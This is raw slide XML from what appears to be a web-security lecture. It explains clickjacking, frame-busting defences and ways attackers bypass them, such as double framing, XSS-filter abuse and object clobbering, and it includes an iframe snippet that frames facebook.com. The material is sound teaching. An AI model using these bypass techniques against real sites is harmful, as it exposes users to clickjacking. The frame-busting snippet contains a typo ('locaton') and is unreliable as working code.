              <a:rPr sz="2400" spc="-11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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="1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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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need  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>protection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-19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clickjacking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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Most</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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frame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busting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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(based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on  some </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>recent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-18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studies)</a:t>
            </a:r>
            <a:endParaRPr sz="24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509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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lekies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>et al. 2012 and Balduzzi et al.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-33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2010</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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309876" y="921512"/>
            <a:ext cx="544004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How </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>we prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Clickjacking?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2813304"/>
            <a:ext cx="0" cy="1092200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1092200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109194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620000" y="2813304"/>
            <a:ext cx="0" cy="1092200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1092200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109194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432304" y="2813050"/>
            <a:ext cx="5194935" cy="12700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5194934" h="12700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5194554" y="12699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519455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432304" y="3886200"/>
            <a:ext cx="5194935" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5194934">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5194554" y="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444750" y="2825750"/>
            <a:ext cx="5168900" cy="1041400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F6FC6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="53340" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="269240" marR="1221105" indent="-238760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(top.location </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>!= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>self.locaton) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>{  parent.location =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-140" dirty="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sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>self.location;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="30480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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65</a:t>
            </a:fld>
            <a:endParaRPr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93902" y="1688845"/>
            <a:ext cx="8016875" cy="21653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7020" marR="1064260" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>technique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-110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solely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-120" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>relies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-110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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-75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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-130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enabling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-55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and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>execution </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-285" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>correctly</a:t>
            </a:r>
            <a:endParaRPr sz="26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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>execution </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>can be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>thwarted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-37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or  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>avoided </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>based on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-235" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>techniques</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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66</a:t>
            </a:fld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765551" y="921512"/>
            <a:ext cx="453072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Framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>effectiveness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435861" y="792734"/>
            <a:ext cx="699579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15" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-15" dirty="0"/>
              <a:t>advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-30" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>types</a:t>
            </a:r>
            <a:endParaRPr sz="400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67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1108963" y="1845056"/>
            <a:ext cx="4912360" cy="221996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259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-21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example)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Double</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Iframe</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Reflective XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>filtering</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Clobbering of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="580"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Restricting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="24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230627" y="792734"/>
            <a:ext cx="5750560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35" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>type: double</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-15" dirty="0"/>
              <a:t>framing</a:t>
            </a:r>
            <a:endParaRPr sz="400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68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1032763" y="1733804"/>
            <a:ext cx="7877809" cy="4552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9079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>two </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>iframes: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Inner </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Outer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-33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200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:endParaRPr sz="22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09DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2750">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Inner</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-9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has</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-50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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page1.html</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" lvl="1" indent="-210185">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="64285"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="534035" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>c="ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p://w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>.facebook.com"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
